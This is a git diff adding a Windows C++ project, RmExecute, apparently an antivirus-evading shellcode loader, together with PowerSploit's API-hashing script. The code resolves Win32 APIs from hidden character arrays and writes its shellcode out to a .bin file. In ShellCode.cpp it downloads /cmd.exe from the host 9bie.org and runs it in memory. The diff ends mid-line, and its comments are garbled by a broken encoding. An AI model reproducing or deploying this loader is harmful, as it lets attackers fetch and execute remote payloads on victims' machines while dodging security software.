diff --git a/Get-FunctionsHash.ps1 b/Get-FunctionsHash.ps1 new file mode 100644 index 0000000..ef997fa --- /dev/null +++ b/Get-FunctionsHash.ps1 @@ -0,0 +1,117 @@ +function Get-FunctionHash +{ +<# +.SYNOPSIS + Outputs a module and function hash that can be passed to the + GetProcAddressWithHash function. + PowerSploit Function: Get-FunctionHash + Author: Matthew Graeber (@mattifestation) + License: BSD 3-Clause + Required Dependencies: None + Optional Dependencies: None +.DESCRIPTION + Get-FunctionHash calculates a hash that can be passed to + GetProcAddressWithHash - a C function that is used to resolve Win32 + library functions. Passing a hash to a function address resolver + prevents plaintext strings from being sent in the clear in shellcode. + A python implementation of this algorithm is present in Meatsploit + will perform hash collision detection. +.PARAMETER Module + Specifies the module to be hashed. Be sure to include the file extension. + The module name will be normalized to upper case. +.PARAMETER Function + Specifies the function to be hashed. The function name is case-sensitive. +.PARAMETER RorValue + Specifies the value by which the hashing algorithm rotates right. The + range of possibles values is 1-31. +.EXAMPLE + Get-FunctionHash kernel32.dll LoadLibraryA +.OUTPUTS + System.String + Outputs a hexadecimal representation of the function hash. +.LINK + http://www.exploit-monday.com/ + https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py +#> + + [CmdletBinding()] Param ( + [Parameter(Position = 0, Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Module, + + [Parameter(Position = 1, Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Function, + + [Parameter(Position = 2)] + [ValidateRange(1, 31)] + [String] + $RorValue = 13 + ) + + $MethodInfo = New-Object Reflection.Emit.DynamicMethod('Ror', [UInt32], @([UInt32], [UInt32])) + $ILGen = $MethodInfo.GetILGenerator(8) + + # C# equivalent of: return x >> n | x << 32 - n; + $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0) + $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1) + $ILGen.Emit([Reflection.Emit.OpCodes]::Ldc_I4_S, 31) + $ILGen.Emit([Reflection.Emit.OpCodes]::And) + $ILGen.Emit([Reflection.Emit.OpCodes]::Shr_Un) + $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0) + $ILGen.Emit([Reflection.Emit.OpCodes]::Ldc_I4_S, 32) + $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1) + $ILGen.Emit([Reflection.Emit.OpCodes]::Sub) + $ILGen.Emit([Reflection.Emit.OpCodes]::Ldc_I4_S, 31) + $ILGen.Emit([Reflection.Emit.OpCodes]::And) + $ILGen.Emit([Reflection.Emit.OpCodes]::Shl) + $ILGen.Emit([Reflection.Emit.OpCodes]::Or) + $ILGen.Emit([Reflection.Emit.OpCodes]::Ret) + + $Delegate = [Func``3[UInt32, UInt32, UInt32]] + + $Ror = $MethodInfo.CreateDelegate($Delegate) + + $MethodInfo = New-Object Reflection.Emit.DynamicMethod('Add', [UInt32], @([UInt32], [UInt32])) + $ILGen = $MethodInfo.GetILGenerator(2) + + # C# equivalent of: return x + y; + $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0) + $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1) + $ILGen.Emit([Reflection.Emit.OpCodes]::Add) + $ILGen.Emit([Reflection.Emit.OpCodes]::Ret) + + $Add = $MethodInfo.CreateDelegate($Delegate) + + $UnicodeEncoder = [Text.Encoding]::Unicode + + $Module = $Module.ToUpper() + [Byte[]] $ModuleBytes = $UnicodeEncoder.GetBytes($Module) + [Byte[]] @(0, 0) + $ModuleHash = [UInt32] 0 + + # Iterate over each byte of the unicode module string including nulls + for ($i = 0; $i -lt $ModuleBytes.Length; $i++) + { + $ModuleHash = $Ror.Invoke($ModuleHash, 13) + $ModuleHash = $Add.Invoke($ModuleHash, $ModuleBytes[$i]) + } + + $AsciiEncoder = [Text.Encoding]::ASCII + [Byte[]] $FunctionBytes = $AsciiEncoder.GetBytes($Function) + @([Byte] 0) + $FunctionHash = [UInt32] 0 + + # Iterate over each byte of the function string including the null terminator + for ($i = 0; $i -lt $FunctionBytes.Length; $i++) + { + $FunctionHash = $Ror.Invoke($FunctionHash, $RorValue) + $FunctionHash = $Add.Invoke($FunctionHash, $FunctionBytes[$i]) + } + + # Add the function hash to the module hash + $FinalHash = $Add.Invoke($ModuleHash, $FunctionHash) + + # Write out the hexadecimal representation of the hash + Write-Output "0x$($FinalHash.ToString('X8'))" +} \ No newline at end of file diff --git a/Image/bypassAV.jpg b/Image/bypassAV.jpg new file mode 100644 index 0000000..a662a81 Binary files /dev/null and b/Image/bypassAV.jpg differ diff --git a/Image/hash.png b/Image/hash.png new file mode 100644 index 0000000..fa84082 Binary files /dev/null and b/Image/hash.png differ diff --git a/RmExecute.sln b/RmExecute.sln new file mode 100644 index 0000000..96276f6 --- /dev/null +++ b/RmExecute.sln @@ -0,0 +1,37 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30907.101 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RmExecute", "RmExecute\RmExecute.vcxproj", "{17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + RUN_EXE_MT|x64 = RUN_EXE_MT|x64 + RUN_EXE_MT|x86 = RUN_EXE_MT|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.Debug|x64.ActiveCfg = Debug|x64 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.Debug|x64.Build.0 = Debug|x64 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.Debug|x86.ActiveCfg = Debug|Win32 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.Debug|x86.Build.0 = Debug|Win32 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.Release|x64.ActiveCfg = Release|x64 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.Release|x64.Build.0 = Release|x64 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.Release|x86.ActiveCfg = Release|Win32 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.Release|x86.Build.0 = Release|Win32 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.RUN_EXE_MT|x64.ActiveCfg = RUN_EXE_MT|x64 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.RUN_EXE_MT|x64.Build.0 = RUN_EXE_MT|x64 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.RUN_EXE_MT|x86.ActiveCfg = RUN_EXE_MT|Win32 + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C}.RUN_EXE_MT|x86.Build.0 = RUN_EXE_MT|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {A0AD0DA4-C5DF-4477-8B1F-B4BAFD5BC54A} + EndGlobalSection +EndGlobal diff --git a/RmExecute/Advapi32.h b/RmExecute/Advapi32.h new file mode 100644 index 0000000..4215623 --- /dev/null +++ b/RmExecute/Advapi32.h @@ -0,0 +1,370 @@ + + +//רŵAdvapi32.dllеϵͳAPI +class Advapi32 :BaseInclude +{ +#define Advapi32_EXTEND_H win.advapi32 +#define Advapi32_DEF(x) if (!Advapi32Base)GetAdvapi32();if (!g_##x##)Init_##x##(); +public: + HMODULE Advapi32Base = 0;//Shell32.dllģַ + +public: + typedef LSTATUS(WINAPI* fnRegCreateKeyExA)( + _In_ HKEY hKey, + _In_ LPCSTR lpSubKey, + _Reserved_ DWORD Reserved, + _In_opt_ LPSTR lpClass, + _In_ DWORD dwOptions, + _In_ REGSAM samDesired, + _In_opt_ CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, + _Out_ PHKEY phkResult, + _Out_opt_ LPDWORD lpdwDisposition + ); + fnRegCreateKeyExA g_RegCreateKeyExA = 0; + + + typedef LSTATUS(WINAPI* fnRegSetValueExA)( + _In_ HKEY hKey, + _In_opt_ LPCSTR lpValueName, + _Reserved_ DWORD Reserved, + _In_ DWORD dwType, + _In_reads_bytes_opt_(cbData) CONST BYTE * lpData, + _In_ DWORD cbData + ); + fnRegSetValueExA g_RegSetValueExA = 0; + + typedef LSTATUS(WINAPI* fnRegCloseKey)( + _In_ HKEY hKey + ); + fnRegCloseKey g_RegCloseKey = 0; + + + typedef LSTATUS(WINAPI* fnRegOpenKeyExA)( + _In_ HKEY hKey, + _In_opt_ LPCSTR lpSubKey, + _In_opt_ DWORD ulOptions, + _In_ REGSAM samDesired, + _Out_ PHKEY phkResult + ); + fnRegOpenKeyExA g_RegOpenKeyExA = 0; + + + typedef LSTATUS(WINAPI* fnRegEnumKeyExA)( + _In_ HKEY hKey, + _In_ DWORD dwIndex, + _Out_writes_to_opt_(*lpcchName, *lpcchName + 1) LPSTR lpName, + _Inout_ LPDWORD lpcchName, + _Reserved_ LPDWORD lpReserved, + _Out_writes_to_opt_(*lpcchClass, *lpcchClass + 1) LPSTR lpClass, + _Inout_opt_ LPDWORD lpcchClass, + _Out_opt_ PFILETIME lpftLastWriteTime + ); + fnRegEnumKeyExA g_RegEnumKeyExA = 0; + + typedef BOOL(WINAPI* fnLookupAccountNameA)( + _In_opt_ LPCTSTR lpSystemName, + _In_ LPCTSTR lpAccountName, + _Out_opt_ PSID Sid, + _Inout_ LPDWORD cbSid, + _Out_opt_ LPTSTR ReferencedDomainName, + _Inout_ LPDWORD cchReferencedDomainName, + _Out_ PSID_NAME_USE peUse + ); + fnLookupAccountNameA g_LookupAccountNameA = 0; + + typedef BOOL(WINAPI* fnGetFileSecurityA)( + _In_ LPCSTR lpFileName, + _In_ SECURITY_INFORMATION RequestedInformation, + _Out_writes_bytes_to_opt_(nLength, *lpnLengthNeeded) PSECURITY_DESCRIPTOR pSecurityDescriptor, + _In_ DWORD nLength, + _Out_ LPDWORD lpnLengthNeeded + ); + fnGetFileSecurityA g_GetFileSecurityA = 0; + + typedef BOOL(WINAPI* fnGetSecurityDescriptorDacl)( + _In_ PSECURITY_DESCRIPTOR pSecurityDescriptor, + _Out_ LPBOOL lpbDaclPresent, + _Outptr_ PACL * pDacl, + _Out_ LPBOOL lpbDaclDefaulted + ); + fnGetSecurityDescriptorDacl g_GetSecurityDescriptorDacl = 0; + + typedef BOOL(WINAPI* fnGetAclInformation)( + _In_ PACL pAcl, + _Out_writes_bytes_(nAclInformationLength) LPVOID pAclInformation, + _In_ DWORD nAclInformationLength, + _In_ ACL_INFORMATION_CLASS dwAclInformationClass + ); + fnGetAclInformation g_GetAclInformation = 0; + + typedef BOOL(WINAPI* fnGetAce)( + _In_ PACL pAcl, + _In_ DWORD dwAceIndex, + _Outptr_ LPVOID * pAce + ); + fnGetAce g_GetAce = 0; + + typedef BOOL(WINAPI* fnEqualSid)( + _In_ PSID pSid1, + _In_ PSID pSid2 + ); + fnEqualSid g_EqualSid = 0; + + typedef BOOL(WINAPI* fnGetUserNameA)( + _Out_writes_to_opt_(*pcbBuffer, *pcbBuffer) LPSTR lpBuffer, + _Inout_ LPDWORD pcbBuffer + ); + fnGetUserNameA g_GetUserNameA = 0; + + +public: + Advapi32() + { + } + + void GetAdvapi32()//ʼԤõĺƫƣShellExecuteA + { + char Advapi32[] = { 'A', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l', '\0' }; + Advapi32Base = fLoadLibraryA(Advapi32); + } + + //APIѰַ +public: + + void __stdcall Init_RegCreateKeyExA() + { + char szRegCreateKeyExA[16] = { 'R', 'e', 'g', 'C', 'r', 'e', 'a', 't', 'e', 'K', 'e', 'y', 'E', 'x', 'A', 0 }; + g_RegCreateKeyExA = (fnRegCreateKeyExA)fGetProcAddress(Advapi32Base, szRegCreateKeyExA); + } + LSTATUS + APIENTRY + RegCreateKeyExA( + _In_ HKEY hKey, + _In_ LPCSTR lpSubKey, + _Reserved_ DWORD Reserved, + _In_opt_ LPSTR lpClass, + _In_ DWORD dwOptions, + _In_ REGSAM samDesired, + _In_opt_ CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, + _Out_ PHKEY phkResult, + _Out_opt_ LPDWORD lpdwDisposition + ) + { + Advapi32_DEF(RegCreateKeyExA); + return g_RegCreateKeyExA(hKey, lpSubKey, Reserved, lpClass, dwOptions, samDesired, lpSecurityAttributes, phkResult, lpdwDisposition); + } + + void __stdcall Init_RegSetValueExA() + { + char szRegSetValueExA[15] = { 'R', 'e', 'g', 'S', 'e', 't', 'V', 'a', 'l', 'u', 'e', 'E', 'x', 'A', 0 }; + g_RegSetValueExA = (fnRegSetValueExA)fGetProcAddress(Advapi32Base, szRegSetValueExA); + } + LSTATUS + APIENTRY + RegSetValueExA( + _In_ HKEY hKey, + _In_opt_ LPCSTR lpValueName, + _Reserved_ DWORD Reserved, + _In_ DWORD dwType, + _In_reads_bytes_opt_(cbData) CONST BYTE * lpData, + _In_ DWORD cbData + ) + { + Advapi32_DEF(RegSetValueExA); + return g_RegSetValueExA(hKey, lpValueName, Reserved, dwType, lpData, cbData); + } + + void __stdcall Init_RegCloseKey() + { + char szRegCloseKey[12] = { 'R', 'e', 'g', 'C', 'l', 'o', 's', 'e', 'K', 'e', 'y', 0 }; + g_RegCloseKey = (fnRegCloseKey)fGetProcAddress(Advapi32Base, szRegCloseKey); + } + LSTATUS + APIENTRY + RegCloseKey( + _In_ HKEY hKey + ) + { + Advapi32_DEF(RegCloseKey); + return g_RegCloseKey(hKey); + } + + void __stdcall Init_RegOpenKeyExA() + { + char szRegOpenKeyExA[14] = { 'R', 'e', 'g', 'O', 'p', 'e', 'n', 'K', 'e', 'y', 'E', 'x', 'A', 0 }; + g_RegOpenKeyExA = (fnRegOpenKeyExA)fGetProcAddress(Advapi32Base, szRegOpenKeyExA); + } + LSTATUS + APIENTRY + RegOpenKeyExA( + _In_ HKEY hKey, + _In_opt_ LPCSTR lpSubKey, + _In_opt_ DWORD ulOptions, + _In_ REGSAM samDesired, + _Out_ PHKEY phkResult + ) + { + Advapi32_DEF(RegOpenKeyExA); + return g_RegOpenKeyExA(hKey, lpSubKey, ulOptions, samDesired, phkResult); + } + + void __stdcall Init_RegEnumKeyExA() + { + char szRegEnumKeyExA[14] = { 'R', 'e', 'g', 'E', 'n', 'u', 'm', 'K', 'e', 'y', 'E', 'x', 'A', 0 }; + g_RegEnumKeyExA = (fnRegEnumKeyExA)fGetProcAddress(Advapi32Base, szRegEnumKeyExA); + } + LSTATUS + APIENTRY + RegEnumKeyExA( + _In_ HKEY hKey, + _In_ DWORD dwIndex, + _Out_writes_to_opt_(*lpcchName, *lpcchName + 1) LPSTR lpName, + _Inout_ LPDWORD lpcchName, + _Reserved_ LPDWORD lpReserved, + _Out_writes_to_opt_(*lpcchClass, *lpcchClass + 1) LPSTR lpClass, + _Inout_opt_ LPDWORD lpcchClass, + _Out_opt_ PFILETIME lpftLastWriteTime + ) + { + Advapi32_DEF(RegEnumKeyExA); + return g_RegEnumKeyExA(hKey, dwIndex, lpName, lpcchName, lpReserved, lpClass, lpcchClass, lpftLastWriteTime); + } + + void __stdcall Init_LookupAccountNameA() + { + char szLookupAccountNameA[19] = { 'L', 'o', 'o', 'k', 'u', 'p', 'A', 'c', 'c', 'o', 'u', 'n', 't', 'N', 'a', 'm', 'e','A', 0 }; + g_LookupAccountNameA = (fnLookupAccountNameA)fGetProcAddress(Advapi32Base, szLookupAccountNameA); + } + BOOL + WINAPI + LookupAccountNameA( + _In_opt_ LPCTSTR lpSystemName, + _In_ LPCTSTR lpAccountName, + _Out_opt_ PSID Sid, + _Inout_ LPDWORD cbSid, + _Out_opt_ LPTSTR ReferencedDomainName, + _Inout_ LPDWORD cchReferencedDomainName, + _Out_ PSID_NAME_USE peUse + ) + { + Advapi32_DEF(LookupAccountNameA); + return g_LookupAccountNameA(lpSystemName, lpAccountName, Sid, cbSid, ReferencedDomainName, cchReferencedDomainName, peUse); + } + + void __stdcall Init_GetFileSecurityA() + { + char szGetFileSecurityA[18] = { 'G', 'e', 't', 'F', 'i', 'l', 'e', 'S', 'e', 'c', 'u', 'r', 'i', 't', 'y', 'A', 0 }; + g_GetFileSecurityA = (fnGetFileSecurityA)fGetProcAddress(Advapi32Base, szGetFileSecurityA); + } + BOOL + WINAPI + GetFileSecurityA( + _In_ LPCSTR lpFileName, + _In_ SECURITY_INFORMATION RequestedInformation, + _Out_writes_bytes_to_opt_(nLength, *lpnLengthNeeded) PSECURITY_DESCRIPTOR pSecurityDescriptor, + _In_ DWORD nLength, + _Out_ LPDWORD lpnLengthNeeded + ) + { + Advapi32_DEF(GetFileSecurityA); + return g_GetFileSecurityA(lpFileName, RequestedInformation, pSecurityDescriptor, nLength, lpnLengthNeeded); + } + + void __stdcall Init_GetSecurityDescriptorDacl() + { + char szGetSecurityDescriptorDacl[26] = { 'G', 'e', 't', 'S', 'e', 'c', 'u', 'r', 'i', 't', 'y', 'D', 'e', 's', 'c', 'r', 'i', 'p', 't', 'o', 'r', 'D', 'a', 'c', 'l', 0 }; + g_GetSecurityDescriptorDacl = (fnGetSecurityDescriptorDacl)fGetProcAddress(Advapi32Base, szGetSecurityDescriptorDacl); + } + BOOL + WINAPI + GetSecurityDescriptorDacl( + _In_ PSECURITY_DESCRIPTOR pSecurityDescriptor, + _Out_ LPBOOL lpbDaclPresent, + _Outptr_ PACL * pDacl, + _Out_ LPBOOL lpbDaclDefaulted + ) + { + Advapi32_DEF(GetSecurityDescriptorDacl); + return g_GetSecurityDescriptorDacl(pSecurityDescriptor, lpbDaclPresent, pDacl, lpbDaclDefaulted); + } + + void __stdcall Init_GetAclInformation() + { + char szGetAclInformation[18] = { 'G', 'e', 't', 'A', 'c', 'l', 'I', 'n', 'f', 'o', 'r', 'm', 'a', 't', 'i', 'o', 'n', 0 }; + g_GetAclInformation = (fnGetAclInformation)fGetProcAddress(Advapi32Base, szGetAclInformation); + } + BOOL + WINAPI + GetAclInformation( + _In_ PACL pAcl, + _Out_writes_bytes_(nAclInformationLength) LPVOID pAclInformation, + _In_ DWORD nAclInformationLength, + _In_ ACL_INFORMATION_CLASS dwAclInformationClass + ) + { + Advapi32_DEF(GetAclInformation); + return g_GetAclInformation(pAcl, pAclInformation, nAclInformationLength, dwAclInformationClass); + } + + void __stdcall Init_GetAce() + { + char szGetAce[7] = { 'G', 'e', 't', 'A', 'c', 'e', 0 }; + g_GetAce = (fnGetAce)fGetProcAddress(Advapi32Base, szGetAce); + } + BOOL + WINAPI + GetAce( + _In_ PACL pAcl, + _In_ DWORD dwAceIndex, + _Outptr_ LPVOID * pAce + ) + { + Advapi32_DEF(GetAce); + return g_GetAce(pAcl, dwAceIndex, pAce); + } + + void __stdcall Init_EqualSid() + { + char szEqualSid[9] = { 'E', 'q', 'u', 'a', 'l', 'S', 'i', 'd', 0 }; + g_EqualSid = (fnEqualSid)fGetProcAddress(Advapi32Base, szEqualSid); + } + BOOL + WINAPI + EqualSid( + _In_ PSID pSid1, + _In_ PSID pSid2 + ) + { + Advapi32_DEF(EqualSid); + return g_EqualSid(pSid1, pSid2); + } + + void __stdcall Init_GetUserNameA() + { + char szGetUserNameA[14] = { 'G', 'e', 't', 'U', 's', 'e', 'r', 'N', 'a', 'm', 'e', 'A', 0 }; + g_GetUserNameA = (fnGetUserNameA)fGetProcAddress(Advapi32Base, szGetUserNameA); + } + BOOL + WINAPI + GetUserNameA( + _Out_writes_to_opt_(*pcbBuffer, *pcbBuffer) LPSTR lpBuffer, + _Inout_ LPDWORD pcbBuffer + ) + { + Advapi32_DEF(GetUserNameA); + return g_GetUserNameA(lpBuffer, pcbBuffer); + } + +#define GetUserNameA Advapi32_EXTEND_H.GetUserNameA +#define EqualSid Advapi32_EXTEND_H.EqualSid +#define GetAce Advapi32_EXTEND_H.GetAce +#define GetAclInformation Advapi32_EXTEND_H.GetAclInformation +#define GetSecurityDescriptorDacl Advapi32_EXTEND_H.GetSecurityDescriptorDacl +#define GetFileSecurityA Advapi32_EXTEND_H.GetFileSecurityA +#define LookupAccountNameA Advapi32_EXTEND_H.LookupAccountNameA +#define RegEnumKeyExA Advapi32_EXTEND_H.RegEnumKeyExA +#define RegOpenKeyExA Advapi32_EXTEND_H.RegOpenKeyExA +#define RegCloseKey Advapi32_EXTEND_H.RegCloseKey +#define RegSetValueExA Advapi32_EXTEND_H.RegSetValueExA +#define RegCreateKeyExA Advapi32_EXTEND_H.RegCreateKeyExA +}; \ No newline at end of file diff --git a/RmExecute/Loader.cpp b/RmExecute/Loader.cpp new file mode 100644 index 0000000..6820815 --- /dev/null +++ b/RmExecute/Loader.cpp @@ -0,0 +1,155 @@ +// RcDllShelcode.cpp : ̨Ӧóڵ㡣 +// + +#include "stdafx.h" +#include +#include"ShellCode.h" +#pragma warning(disable:4996) +//#pragma comment(linker, "/section:.data,RWE") + +DWORD ReadFileData(char *szFilePath, char *pBuf) +{ + DWORD dwBytesRead; + HANDLE hFile; + + hFile = CreateFile(szFilePath, GENERIC_READ, FILE_SHARE_READ, NULL, + OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (hFile == INVALID_HANDLE_VALUE) + { + return 0; + } + + DWORD dwFileSize = GetFileSize(hFile, 0); + if (dwFileSize == 0) + { + CloseHandle(hFile); + return 0; + } + + ReadFile(hFile, pBuf, dwFileSize, &dwBytesRead, NULL); + CloseHandle(hFile); + return dwFileSize; +} +DWORD GetFileSizeLen(char *szSource) +{ + + HANDLE hFile; + + hFile = CreateFile(szSource, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + + if (hFile == INVALID_HANDLE_VALUE) + { + MessageBoxA(NULL, "ļδҵ", NULL, NULL); + return 0; + } + + DWORD dwFileSize = GetFileSize(hFile, 0); + if (dwFileSize == 0) + { + MessageBoxA(NULL, "ļΪ㣡", NULL, NULL); + CloseHandle(hFile); + return 0; + } + CloseHandle(hFile); + return dwFileSize; +} + + +#ifndef RUNEXEMT +void RunShellCode() +{ + int dwShellCodeLen = (int)mmLoaderSCEnd - (int)mmLoaderSCStart; + + void* shellcodeEnter = mmLoaderSCStart; + typedef void(WINAPI* fnFun)( + char* + ); + char URL[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; + fnFun Shellcode = (fnFun)(shellcodeEnter); + Shellcode(URL); + +} +#else + +void RunShellCode() +{ + + char shelname[] = "123.bin"; + + DWORD filelen = GetFileSizeLen(shelname); + char *filebuf = new char[filelen]; + ReadFileData(shelname, filebuf); + + char URL[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; + + typedef void(WINAPI* fnFun)( + char* + ); + + fnFun Shellcode = (fnFun)(filebuf); + Shellcode(URL); + +} +#endif + + +/* +Shelocdeд,ȡ, + +Debugģʽ£ԱдshelcodeǷ + +ReleaseģʽΪȡshelcodeȡĶǿֱcallĻ + +RUN_EXE_MT Ϊõexe +*/ +#ifdef RUNEXEMT +/* +int APIENTRY _tWinMain(_In_ HINSTANCE hInstance, + _In_opt_ HINSTANCE hPrevInstance, + _In_ LPTSTR lpCmdLine, + _In_ int nCmdShow) +{ +*/ +int _tmain(int argc, _TCHAR* argv[]) +{ +#else + +int _tmain(int argc, _TCHAR* argv[]) +{ +#endif + + +#ifdef _DEBUG + + + RunShellCode(); + + return 0; +#else +//üӽܵĿ +// #define RC4_EN + + // + int dwShellCodeLen = (int)mmLoaderSCEnd - (int)mmLoaderSCStart; + + void * shellcodeEnter =mmLoaderSCStart; + + + //shellcodeļ + FILE *fp; + fp = fopen("123.bin", "w+b"); + if (fp) + { +#ifdef RC4_EN + fwrite(shellcodeEnter, (dwShellCodeLen + sizeof(s_flag)*2), 1, fp); +#else + fwrite(shellcodeEnter, dwShellCodeLen, 1, fp); +#endif + fclose(fp); + } + + return 0; +#endif +} + diff --git a/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe b/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe new file mode 100644 index 0000000..7fa831b --- /dev/null +++ b/RmExecute/RUN_EXE_MT/RcDllShelcode.exe.recipe @@ -0,0 +1,11 @@ + + + + + C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RcDllShelcode.exe + + + + + + \ No newline at end of file diff --git a/RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt b/RmExecute/RUN_EXE_MT/RcDllShelcode.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe b/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe new file mode 100644 index 0000000..03cf3a8 --- /dev/null +++ b/RmExecute/RUN_EXE_MT/RmExecute.exe.recipe @@ -0,0 +1,11 @@ + + + + + C:\Users\admin\Desktop\RcDllShelcode\RUN_EXE_MT\RmExecute.exe + + + + + + \ No newline at end of file diff --git a/RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt b/RmExecute/RUN_EXE_MT/RmExecute.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/RmExecute/RmExecute.vcxproj b/RmExecute/RmExecute.vcxproj new file mode 100644 index 0000000..07df817 --- /dev/null +++ b/RmExecute/RmExecute.vcxproj @@ -0,0 +1,178 @@ + + + + + Debug + Win32 + + + Debug + x64 + + + Release + Win32 + + + Release + x64 + + + RUN_EXE_MT + Win32 + + + RUN_EXE_MT + x64 + + + + {17B77F7B-8A2C-49AE-926A-1D1E5383BD1C} + Win32Proj + RcDllShelcode + RmExecute + + + + Application + true + v142 + MultiByte + false + + + Application + true + v142 + MultiByte + Static + + + Application + false + v142 + true + MultiByte + Static + + + v142 + + + v142 + + + v142 + + + + + + + + + + + + + + + + false + + + false + + + false + + + + + + Level3 + _CRT_SECURE_NO_WARNINGS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + false + MultiThreaded + Default + /Gs32768 %(AdditionalOptions) + + + Console + true + false + true + /SAFESEH:NO %(AdditionalOptions) + kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) + + + AsInvoker + + + + + + + Level3 + RUNEXEMT;_CRT_SECURE_NO_WARNINGS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + false + MultiThreaded + Default + /Gs32768 %(AdditionalOptions) + MaxSpeed + None + Neither + + + Console + false + false + true + /SAFESEH:NO %(AdditionalOptions) + kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;msvcrt.lib;%(AdditionalDependencies) + + + AsInvoker + + + + + Level3 + + + MaxSpeed + true + WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + MultiThreaded + true + false + Speed + true + false + false + None + /Gs32768 %(AdditionalOptions) + + + Console + false + user32.lib;winhttp.lib;msvcrt.lib; + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/RmExecute/RmExecute.vcxproj.filters b/RmExecute/RmExecute.vcxproj.filters new file mode 100644 index 0000000..e138b48 --- /dev/null +++ b/RmExecute/RmExecute.vcxproj.filters @@ -0,0 +1,51 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + {f1ff9032-204a-44ff-b5cf-e171033df1a4} + + + + + 头文件 + + + 头文件 + + + 头文件\Tool + + + 头文件 + + + 头文件 + + + 头文件 + + + + + 源文件 + + + 源文件 + + + 源文件 + + + \ No newline at end of file diff --git a/RmExecute/ShellCode.cpp b/RmExecute/ShellCode.cpp new file mode 100644 index 0000000..6742eb2 --- /dev/null +++ b/RmExecute/ShellCode.cpp @@ -0,0 +1,89 @@ +#include "ShellCode.h" + +//ʼתں +VOID _declspec(naked) mmLoaderSCStart() +{ + + __asm jmp Strat; +} + + + + +//ҪתΪshellcodeд +class RmExecute +{ +public: + // +#include"Tool.h" + +public: + //ģȫֱ---ǶĿȫֱĶ + + + Functions fn; + char s_runexe[260]; + char* newbuff; + + +public: + //ȫֱʼԼһЩʼIJ + RmExecute() + { + + newbuff = NULL; + Initfunctions(&fn); + char runexe[] = { 'A', 'A','\0' }; + fn.fnmemcpy(s_runexe, runexe, 260); + }; + + + + + ~RmExecute() + { + }; + + +public: + + + //ȡĿmainļStartSCode൱Ŀmain + void __stdcall StartSCode(char * URL) + { + + + wchar_t host[] = {'9','b','i','e','.','o','r','g' ,'\0' }; + wchar_t path[] = { '/','c','m','d','.','e','x','e','\0' }; + + + //ʹAPI֮ǰһҪַʧ + Initfunctions(&fn); + + int size = HttpDownload(host, path, 443, TRUE); + + fn.fnMessageBoxA(NULL, newbuff, NULL, MB_OK); + + RunPortableExecutable(); + + fn.fnfree(newbuff); + // HttpDownloadһҪfree + } + + + +}; + +//sehllcodeں +void 